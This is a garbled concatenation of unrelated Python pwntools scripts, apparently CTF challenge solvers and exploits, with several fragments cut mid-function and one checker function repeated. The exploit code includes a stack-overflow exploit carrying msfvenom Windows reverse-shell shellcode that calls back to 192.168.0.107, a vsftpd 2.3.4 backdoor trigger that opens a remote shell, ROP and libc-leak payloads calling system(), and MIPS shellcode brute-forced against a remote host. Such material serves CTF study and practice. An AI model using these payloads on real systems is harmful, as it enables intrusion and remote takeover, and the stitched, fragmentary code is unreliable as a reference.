r = remote('macsh.chal.pwning.xxx', 64791)
def e(m, mac = '0'):
global r
r.sendlineafter('> ', mac+'<|>'+m)
return r.recvline()
def test(cmd):
global r
echo = 'echo ' + '3' * (len(cmd)-5)
p = 'tag ' + echo
p1 = echo + '\x00' * (16-len(echo))
p2 = cmd + '\x00' * (16-len(cmd))
import pwn
io = pwn.remote("localhost", 9000)
if pwn.args.GDB:
# breakpoints:
# 0x4001d4: vuln.leave
# 0x400138: after notvuln.write
# 0x400165: after notvuln.read
pwn.gdb.attach(
target="chall", # Takes the youngest PID matching this name
exe="./chall",
gdbscript="""
break *0x4001d4
break *0x400138
break *0x400165
continue
""",
)
pwn.context.binary = elf = pwn.ELF("chall")
stack_shadow = elf.symbols["__stack_shadow"]
print(hex(stack_shadow))
"""
Exploit:
- Overwrite $rbp to set address for an arbitrary write
- The address we'll use is `__stack_shadow`
- Overwrite return address in `__stack_shadow` to control $rip
- Jump into shellcode also stored on .bss, which is RWX
"""
def find_change(coins, value):
coins = sorted(coins, reverse=True)
coin_dict = {}
for c in coins:
if value % c == 0:
coin_dict[c] = value / c
return coin_dict
else:
coin_dict[c] = math.trunc(value/ float(c))
value -= (c * coin_dict[c])
coins = [1, 5, 10, 25, 50, 100, 500, 1000, 2000, 5000, 10000, 50000, 100000, 500000, 1000000]
print ('Started')
r = pwn.remote("misc.chal.csaw.io", 8000)
iteration_count = 0
while True:
iteration_count += 1
print ('ROUND # %s'%(iteration_count))
l1 = r.recvline(timeout=2)
print(l1)
amount = int(round(float(str(l1.rstrip()[1:])) * 100))
print "Coins needed: " + str(amount)
answer = find_change(coins, amount)
for coin in sorted(coins, reverse=True):
l2 = r.recvuntil(':', timeout=2)
print(l2)
def benign(ip, port):
def rand_str():
return ''.join(random.choice(string.ascii_letters) for i in range(30))
pwn.context(timeout=10)
word_cnt = random.randrange(3, 10)
words = []
for i in range(word_cnt):
words.append([rand_str(), rand_str(), rand_str()])
dict_id1 = rand_str()
pwd1 = rand_str()
dict_id2 = rand_str()
pwd2 = rand_str()
str_to_translate = " ".join([x[0] for x in words])
str_after_translate_1 = " ".join([x[1] for x in words])
str_after_translate_2 = " ".join([x[2] for x in words])
str_without_translate = str_to_translate
r = pwn.remote(ip, port)
if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
raise RuntimeError("Wrong banner")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong default translation")
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match(
"Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n')
if not r.recvline() == "Dictionary created\n":
raise RuntimeError("Can't create dictionary 1")
for (word_from, word_to1, word_to2) in words:
r.send("add {} {}\n".format(word_from, word_to1))
if not r.recvline() == "Word saved!\n":
raise RuntimeError("Can't store word")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_1:
raise RuntimeError("Wrong translation after adding words")
r.send("dict {}\n".format(dict_id2))
info = r.recvline()
m = re.match(
"Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
if not r.recvline() == "Dictionary created\n":
raise RuntimeError("Can't create dictionary 2")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong translation after switching dictionaries")
for (word_from, word_to1, word_to2) in words:
r.send("add {} {}\n".format(word_from, word_to2))
if not r.recvline() == "Word saved!\n":
raise RuntimeError("Can't store word")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_2:
raise RuntimeError(
"Wrong translation after adding words to another dictionary")
r.send("quit\n")
if not r.recvall() == "Good bye!\n":
raise RuntimeError("Wrong goodbye")
r = pwn.remote(ip, port)
if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
raise RuntimeError("Wrong banner")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError(
"Wrong default translation after words added to another dictionary"
)
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match(
"Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
if not r.recvline() == "Dictionary exists and password doesn't match\n":
raise RuntimeError("Wrong message after wrong password")
if not r.recvline() == "Dictionary not loaded\n":
raise RuntimeError("Wrong message after wrong password")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong translation after wrong password attempt")
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match(
"Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(pwd1 + 'XXX\n')
if not r.recvline() == 'Please input only hexadecimal characters\n':
raise RuntimeError("Wrong message after invalid password")
if not r.recvline() == "Dictionary not loaded\n":
raise RuntimeError("Wrong message after invalid password")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong translation after invalid password attempt")
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match(
"Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n')
if not r.recvline() == 'Password ok!\n':
raise RuntimeError("Can't load dictionary")
if not r.recvline() == 'Dictionary loaded\n':
raise RuntimeError("Can't load dictionary")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_1:
raise RuntimeError("Wrong translation after loading stored dictionary")
r.send("dict {}\n".format(dict_id2))
info = r.recvline()
m = re.match(
"Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n",
info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
if not r.recvline() == 'Password ok!\n':
raise RuntimeError("Can't load dictionary")
if not r.recvline() == 'Dictionary loaded\n':
raise RuntimeError("Can't load dictionary")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_2:
raise RuntimeError("Wrong translation after loading stored dictionary")
r.send("quit\n")
if not r.recvall() == "Good bye!\n":
raise RuntimeError("Wrong goodbye")
import pwn
import struct
import time
import subprocess
import re
LOCAL = False
if LOCAL:
sh = pwn.process('hive')
else:
sh = pwn.remote('104.196.102.240', 5000)
def get_timestamp_hash (timestamp) :
proc = subprocess.Popen('./hive_patched', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
stdout, stderr = proc.communicate(struct.pack('<L', timestamp))
return stdout[-33:]
def login(sh):
initial = sh.recv(1024)
timestr = re.findall('time is: (.*?),', initial)[0]
print '[+] timestr', timestr
timehash = get_timestamp_hash(int(timestr))
print '[+] timehash', timehash
sh.sendline('username')
sh.sendline('5up3rm@n')
sh.sendline(timehash)
def build_rop():
pack = struct.pack
#!/usr/bin/env python3
from pwn import remote
import os
RHOST = "192.168.0.108"
RPORT = 9999
socket = remote(RHOST,RPORT)
# ./yz-patterns.py -p bruijn -l 4000 -a 123456789
pattern = b"1111211131114111511161117111811191122112311241125112611271128112911321133113411351136113711381139114211431144114511461147114811491152115311541155115611571158115911621163116411651166116711681169117211731174117511761177117811791182118311841185118611871188118911921193119411951196119711981199121213121412151216121712181219122212231224122512261227122812291232123312341235123612371238123912421243124412451246124712481249125212531254125512561257125812591262126312641265126612671268126912721273127412751276127712781279128212831284128512861287128812891292129312941295129612971298129913131413151316131713181319132213231324132513261327132813291332133313341335133613371338133913421343134413451346134713481349135213531354135513561357135813591362136313641365136613671368136913721373137413751376137713781379138213831384138513861387138813891392139313941395139613971398139914141514161417141814191422142314241425142614271428142914321433143414351436143714381439144214431444144514461447144814491452145314541455145614571458145914621463146414651466146714681469147214731474147514761477147814791482148314841485148614871488148914921493149414951496149714981499151516151715181519152215231524152515261527152815291532153315341535153615371538153915421543154415451546154715481549155215531554155515561557155815591562156315641565156615671568156915721573157415751576157715781579158215831584158515861587158815891592159315941595159615971598159916161716181619162216231624162516261627162816291632163316341635163616371638163916421643164416451646164716481649165216531654165516561657165816591662166316641665166616671668166916721673167416751676167716781679168216831684168516861687168816891692169316941695169616971698169917171817191722172317241725172617271728172917321733173417351736173717381739174217431744174517461747174817491752175317541755175617571758175917621763176417651766176717681769177217731774177517761777177817791782178317841785178617871788178917921793179417951796179717981799181819182218231824182518261827182818291832183318341835183618371838183918421843184418451846184718481849185218531854185518561857185818591862186318641865186618671868186918721873187418751876187718781879188218831884188518861887188818891892189318941895189618971898189919192219231924192519261927192819291932193319341935193619371938193919421943194419451946194719481949195219531954195519561957195819591962196319641965196619671968196919721973197419751976197719781979198219831984198519861987198819891992199319941995199619971998199922223222422252226222722282229223322342235223622372238223922432244224522462247224822492253225422552256225722582259226322642265226622672268226922732274227522762277227822792283228422852286228722882289229322942295229622972298229923232423252326232723282329233323342335233623372338233923432344234523462347234823492353235423552356235723582359236323642365236623672368236923732374237523762377237823792383238423852386238723882389239323942395239623972398239924242524262427242824292433243424352436243724382439244324442445244624472448244924532454245524562457245824592463246424652466246724682469247324742475247624772478247924832484248524862487248824892493249424952496249724982499252526252725282529253325342535253625372538253925432544254525462547254825492553255425552556255725582559256325642565256625672568256925732574257525762577257825792583258425852586258725882589259325942595259625972598259926262726282629263326342635263626372638263926432644264526462647264826492653265426552656265726582659266326642665266626672668266926732674267526762677267826792683268426852686268726882689269326942695269626972698269927272827292733273427352736273727382739274327442745274627472748274927532754275527562757275827592763276427652766276727682769277327742775277627772778277927832784278527862787278827892793279427952796279727982799282829283328342835283628372838283928432844284528462847284828492853285428552856285728582859286328642865286628672868286928732874287528762877287828792883288428852886288728882889289328942895289628972898289929293329342935293629372938293929432944"
# always check bad chars !!!
badchars = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.107 LPORT=8990 EXITFUNC=thread -a x86 -f c -b "\x00"
rev_shell2 = b"\xba\x33\x40\xe5\x4b\xda\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1\x52\x83\xe8\xfc\x31\x50\x0e\x03\x63\x4e\x07\xbe\x7f\xa6\x45\x41\x7f\x37\x2a\xcb\x9a\x06\x6a\xaf\xef\x39\x5a\xbb\xbd\xb5\x11\xe9\x55\x4d\x57\x26\x5a\xe6\xd2\x10\x55\xf7\x4f\x60\xf4\x7b\x92\xb5\xd6\x42\x5d\xc8\x17\x82\x80\x21\x45\x5b\xce\x94\x79\xe8\x9a\x24\xf2\xa2\x0b\x2d\xe7\x73\x2d\x1c\xb6\x08\x74\xbe\x39\xdc\x0c\xf7\x21\x01\x28\x41\xda\xf1\xc6\x50\x0a\xc8\x27\xfe\x73\xe4\xd5\xfe\xb4\xc3\x05\x75\xcc\x37\xbb\x8e\x0b\x45\x67\x1a\x8f\xed\xec\xbc\x6b\x0f\x20\x5a\xf8\x03\x8d\x28\xa6\x07\x10\xfc\xdd\x3c\x99\x03\x31\xb5\xd9\x27\x95\x9d\xba\x46\x8c\x7b\x6c\x76\xce\x23\xd1\xd2\x85\xce\x06\x6f\xc4\x86\xeb\x42\xf6\x56\x64\xd4\x85\x64\x2b\x4e\x01\xc5\xa4\x48\xd6\x2a\x9f\x2d\x48\xd5\x20\x4e\x41\x12\x74\x1e\xf9\xb3\xf5\xf5\xf9\x3c\x20\x59\xa9\x92\x9b\x1a\x19\x53\x4c\xf3\x73\x5c\xb3\xe3\x7c\xb6\xdc\x8e\x87\x51\x23\xe6\x87\xca\xcb\xf5\x87\x2f\x12\x73\x61\x45\x3a\xd5\x3a\xf2\xa3\x7c\xb0\x63\x2b\xab\xbd\xa4\xa7\x58\x42\x6a\x40\x14\x50\x1b\xa0\x63\x0a\x8a\xbf\x59\x22\x50\x2d\x06\xb2\x1f\x4e\x91\xe5\x48\xa0\xe8\x63\x65\x9b\x42\x91\x74\x7d\xac\x11\xa3\xbe\x33\x98\x26\xfa\x17\x8a\xfe\x03\x1c\xfe\xae\x55\xca\xa8\x08\x0c\xbc\x02\xc3\xe3\x16\xc2\x92\xcf\xa8\x94\x9a\x05\x5f\x78\x2a\xf0\x26\x87\x83\x94\xae\xf0\xf9\x04\x50\x2b\xba\x25\xb3\xf9\xb7\xcd\x6a\x68\x7a\x90\x8c\x47\xb9\xad\x0e\x6d\x42\x4a\x0e\x04\x47\x16\x88\xf5\x35\x07\x7d\xf9\xea\x28\x54"
payload = b""
payload += b"TRUN /.:/"
payload += pattern[:2003]
payload += b"\xaf\x11\x50\x62"#625011AF
payload += b"\x90"*32
payload += rev_shell2
print("[-] Sending buffer with a length of: " + str(len(payload)))
socket.send(payload)
print("[+] Buffer sent.")
socket.close()
def __init__(self, host, port):
print colored('>> Happy pwning !', 'cyan')
self.conn = pwn.remote(host, port)
import pwn
# conn = pwn.process('./vuln')
conn = pwn.remote('docker.hackthebox.eu', 30638)
print(conn.recvline())
ss = 'a' * (0x9b1c - 0x9a60)
ss += pwn.p32(0x080491e2) # flag函数地址,这个地址因为栈溢出而被修改
ss += pwn.p32(0x08049313) # vuln函数地址
ss += pwn.p32(0xdeadbeef) # 在flag函数中会对比[ebp+0x8]
ss += pwn.p32(0xc0ded00d) # 在flag函数中会对比[ebp+0xc]
conn.sendline(ss)
print(conn.recv())
print(conn.recv())
conn.sendline('123')
conn.recvline()
import pwn
import base64
import os
print "Started!"
r = pwn.remote("pwn.chal.csaw.io", 8001)
print(r.recvline())
print(r.recvline())
print(r.recvline())
print(r.recvline())
print(r.recvline())
print(r.recvline())
print(r.recvline())
print(r.recvline())
print(r.recvline())
print('GETTING HELP')
r.sendline('help')
print(r.recvline())
print('RECV HELP')
l2 = r.recvuntil(', \'exit\', or \'help\'.', timeout=2)
print(l2)
print('CREATING FILE')
f = open('/root/Desktop/github/RT_CTF/csaw/aui', 'wb')
f.write(l2)
f.close()
def init(args):
p = remote(args.host, 8888, level='error')
return p
def connect():
if LOCAL:
return pwn.remote('127.0.0.1', 1337)
else:
return pwn.remote('0db14e.hack.dat.kiwi', 1337)
#!/usr/bin/env python
import pwn
import re
host, port = '2018shell2.picoctf.com', 15853
s = pwn.remote(host, port)
prompt = s.recv()
print prompt
binary = re.findall('the (.*) as a word', prompt)[0]
answer = hex(int(binary.replace(' ', ''),2))[2:].decode('hex')
s.sendline(answer)
prompt = s.recv()
print prompt
hexadecimal = re.findall('the (.*) as a word', prompt)[0]
print hexadecimal.decode('hex')
s.sendline(answer)
prompt = s.recv()
print prompt
octal = re.findall('the (.*) as a word', prompt)[0]
def connect(self, ip, port_no):
self.conn = pwn.remote(ip, port_no)
def leak(addr):
global stack_addr
func_addr = 0x080498a6
index = (stack_addr + 0x20 - command) // 4
payload = str(index).ljust(0x10, 'A').encode()
payload += pwn.p32(func_addr) + pwn.p32(0x0)
payload += pwn.p32(elf.plt[b'write']) + pwn.p32(elf.sym[b'main'])
payload += pwn.p32(1) + pwn.p32(addr) + pwn.p32(0x4)
stack_addr -= 0xf0
io.recvuntil('> ')
io.sendline(payload)
return io.recv(4)
command = 0x08058154
io = pwn.remote('chall.pwnable.tw', 10202)
stack_addr = leak_stack()
dynelf = pwn.DynELF(leak, elf=elf)
system_addr = dynelf.lookup(b'system', b'libc')
index = (stack_addr + 0x60 - command) // 4
payload = (str(index).encode() + b';/bin/cat /home/starbound/flag\x00').ljust(
0x50, b'A') + pwn.p32(system_addr)
io.recvuntil('> ')
io.sendline(payload)
io.interactive()
import time, pwn, os, struct
local = False
if local:
s = pwn.remote("localhost", 2323)
os.system("echo nye; pgrep messenger; echo bye")
raw_input("> ")
else:
s = pwn.remote("110.10.212.137", 3333)
print s.recvuntil(">> ")
def allocate_note(s, size, msg):
s.send("L\n")
print s.recv(1024)
s.send("{}\n".format(size))
print s.recv(1024)
s.send("{}\n".format(msg))
print s.recvuntil(">> ")
def change_note(s, index, size, msg):
s.send("C\n")
print s.recv(1024)
s.send("{}\n".format(index))
print s.recv(1024)
s.send("{}\n".format(size))
print s.recv(1024)
s.send("{}\n".format(msg))
print s.recvuntil(">> ")
def remove_note(s, index):
s.send("R\n")
#!/usr/bin/python3
import pwn
HOST, PORT = 'pwn2.ctf.nullcon.net', 5002
DEBUG = False
libc = pwn.ELF('./libc-2.23.so')
if DEBUG:
env = {'LD_PRELOAD': './libc-2.23.so'}
p = pwn.process(['./ld-2.23.so', './challenge'], env=env)
else:
p = pwn.remote(HOST, PORT)
pwn.context.log_level = 'debug'
def Menu(i):
p.recvuntil('5) Checkout!\n')
if exploit:
p.sendline('0' * (i - 1))
p.recvline()
else:
p.sendline(str(i))
def Malloc(name):
assert len(name) <= 0xF8
Menu(1)
p.recvuntil('Name of the book?\n')
#!/usr/bin/env python3
import pwn
import sys
pwn.context.endian = 'big'
SHELL_CODE = b'\x28\x06\xff\xff\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xf4\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf8\xaf\xa0\xff\xfc\x27\xa4\xff\xf4\x28\x05\xff\xff\x24\x02\x0f\xab\x00\x00\x00\x0c'
for i in range(4092, 0, -4):
p = pwn.remote('host', 12345)
print(p.recvuntil(b'name:'))
payload = b'a' * 20
payload += pwn.p32(0x7ffff000 + i)
payload += SHELL_CODE
p.sendline(payload)
p.sendline(b'echo test_shell')
r = p.recvline()
if b'test_shell' in r:
p.sendline(b'cat .passwd')
print(p.recvline())
p.close()
break
else:
p.close()
def solve():
r = pwn.remote('misc.chal.csaw.io', 8308)
generator = random.Random()
generator.seed() # Seed from current time
while True:
l = r.recvline().strip('\n')
print(l)
if(l == 'I need a new Visa!'):
r.writeline(cg.credit_card_number(generator, cg.visaPrefixList, 16, 1)[0])
continue
if(l == 'I need a new Discover!'):
r.writeline(cg.credit_card_number(generator, cg.discoverPrefixList, 16, 1)[0])
continue
if(l == 'I need a new MasterCard!'):
r.writeline(cg.credit_card_number(generator, cg.mastercardPrefixList, 16, 1)[0])
continue
if(l == 'I need a new American Express!'):
r.writeline(cg.credit_card_number(generator, cg.amexPrefixList, 15, 1)[0])
continue
if(l.startswith('I need a new card that starts with')):
numberpart = l.replace('I need a new card that starts with ','').replace('!','')
result = ''
if(numberpart.startswith('2')
or numberpart.startswith('3')
or numberpart.startswith('4')
or numberpart.startswith('5')
or numberpart.startswith('7')
or numberpart.startswith('8')
or numberpart.startswith('9')):
result = cg.completed_number(list(numberpart), 16)
if(numberpart.startswith('6')
or numberpart.startswith('1')):
result = cg.completed_number(list(numberpart), 15)
print('NumberPart = {}, result={}'.format(numberpart, result))
r.writeline(result)
continue
if(l.startswith('I need a new card which ends with')):
numberpart = l.replace('I need a new card which ends with ', '').replace('!', '')
if(len(numberpart) == 1):
cards = cg.credit_card_number(generator, cg.mastercardPrefixList, 16, 100)
card = next((x for x in cards if x.endswith(numberpart)), None)
print('NumberPart = {}, card={}'.format(numberpart, card))
r.writeline(card)
continue
while True:
part_without_last = numberpart[0:len(numberpart)-1]
tcard = cg.completed_number_behind(list(part_without_last), 16)
print('NumberPart = {}, card={}'.format(numberpart, tcard))
if(tcard.startswith('0')):
continue
if(tcard.endswith(numberpart)):
r.writeline(tcard)
break
continue
if(l.startswith('I need to know if')):
numberpart = l.replace('I need to know if ', '').replace(' is valid! (0 = No, 1 = Yes)', '')
print (numberpart)
answer = is_valid(numberpart)
print ('NumberPart = {}, is_valid = {}'.format(numberpart, answer))
r.writeline(answer)
continue
if(l == 'Thanks!'):
continue
if(l == 'True'):
continue
if(l == 'False'):
continue
if(l == "Hmmmmm that doesn't seem correct..."):
continue
raise Exception('Unknown command')
from utils.basics import hex_to_ascii
from utils.rsa.rsa_lsb_oracle import lsboracle
from pwn import remote
r = remote("challenges1.hexionteam.com", 5000)
def comm(msg: int) -> int:
r.sendline(str(msg))
return int(r.recvline().decode().strip().strip('>').strip())
def main():
flag = int(r.recvline().decode().split(": ")[1].strip())
assert r.recvline() == b'One encrypt:\n'
r.recvuntil("m => ")
r.sendline("-1")
N = int(r.recvline()) + 1
print("N:", N)
assert r.recvline() == b'Alot of unhelpful decrypts:\n'
dec = lsboracle(flag, comm, 65537, N)
print(dec)
print(hex_to_ascii(dec))
if __name__ == "__main__":
main()
def benign(ip, port):
def rand_str():
return ''.join(random.choice(string.ascii_letters) for i in range(30))
pwn.context(timeout=10)
word_cnt = random.randrange(3, 10)
words = []
for i in range(word_cnt):
words.append([rand_str(), rand_str(), rand_str()])
dict_id1 = rand_str()
pwd1 = rand_str()
dict_id2 = rand_str()
pwd2 = rand_str()
str_to_translate = " ".join([x[0] for x in words])
str_after_translate_1 = " ".join([x[1] for x in words])
str_after_translate_2 = " ".join([x[2] for x in words])
str_without_translate = str_to_translate
r = pwn.remote(ip, port)
if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
raise RuntimeError("Wrong banner")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong default translation")
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n')
if not r.recvline() == "Dictionary created\n":
raise RuntimeError("Can't create dictionary 1")
for (word_from, word_to1, word_to2) in words:
r.send("add {} {}\n".format(word_from, word_to1))
if not r.recvline() == "Word saved!\n":
raise RuntimeError("Can't store word")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_1:
raise RuntimeError("Wrong translation after adding words")
r.send("dict {}\n".format(dict_id2))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
if not r.recvline() == "Dictionary created\n":
raise RuntimeError("Can't create dictionary 2")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong translation after switching dictionaries")
for (word_from, word_to1, word_to2) in words:
r.send("add {} {}\n".format(word_from, word_to2))
if not r.recvline() == "Word saved!\n":
raise RuntimeError("Can't store word")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_2:
raise RuntimeError("Wrong translation after adding words to another dictionary")
r.send("quit\n")
if not r.recvall() == "Good bye!\n":
raise RuntimeError("Wrong goodbye")
r = pwn.remote(ip, port)
if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
raise RuntimeError("Wrong banner")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong default translation after words added to another dictionary")
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
if not r.recvline() == "Dictionary exists and password doesn't match\n":
raise RuntimeError("Wrong message after wrong password")
if not r.recvline() == "Dictionary not loaded\n":
raise RuntimeError("Wrong message after wrong password")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong translation after wrong password attempt")
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(pwd1 + 'XXX\n')
if not r.recvline() == 'Please input only hexadecimal characters\n':
raise RuntimeError("Wrong message after invalid password")
if not r.recvline() == "Dictionary not loaded\n":
raise RuntimeError("Wrong message after invalid password")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_without_translate:
raise RuntimeError("Wrong translation after invalid password attempt")
r.send("dict {}\n".format(dict_id1))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n')
if not r.recvline() == 'Password ok!\n':
raise RuntimeError("Can't load dictionary")
if not r.recvline() == 'Dictionary loaded\n':
raise RuntimeError("Can't load dictionary")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_1:
raise RuntimeError("Wrong translation after loading stored dictionary")
r.send("dict {}\n".format(dict_id2))
info = r.recvline()
m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
if not r.recvline() == 'Password ok!\n':
raise RuntimeError("Can't load dictionary")
if not r.recvline() == 'Dictionary loaded\n':
raise RuntimeError("Can't load dictionary")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_2:
raise RuntimeError("Wrong translation after loading stored dictionary")
r.send("quit\n")
if not r.recvall() == "Good bye!\n":
raise RuntimeError("Wrong goodbye")
#!/usr/bin/python3
from pwn import log,remote
from sys import argv,exit
from time import sleep
if len(argv) < 2:
exit(f'Usage: {argv[0]} Target_IP')
p = log.progress("Running")
vsftpd = remote(argv[1], 21)
p.status('Checking Version')
recv = vsftpd.recvuntil(")",timeout=5)
version = (recv.decode()).split(" ")[2].replace(")","")
if version != '2.3.4':
exit('2.3.4 Version Not Found')
vsftpd.sendline('USER hii:)')
vsftpd.sendline('PASS hello')
p.status('Backdoor Activated')
sleep(3)
backdoor = remote(argv[1], 6200)
p.success("Got Shell!!!")
backdoor.interactive()
import pwn
r = pwn.remote('jh2i.com', 50031)
turnToShop = 1
while True:
try:
print(
'--------------------------------------------------------------------------------'
)
msg = r.recv().decode()
print(msg)
msg = msg.split()
gold = msg[msg.index('Gold:') + 1]
level = msg[msg.index('level:') + 1]
# print(msg)
print('Gold : ', gold)
print('Level : ', level)
# browse the shop
if level == '0':
if turnToShop == 1:
print('Browsing the shop...')
turnToShop = 0
r.sendline('6')
else:
print('Buying sword...')
turnToShop = 1
r.sendline('1')
elif level == '1':
if int(gold) < 1000:
print('Going on a journey...')
r.sendline('5')
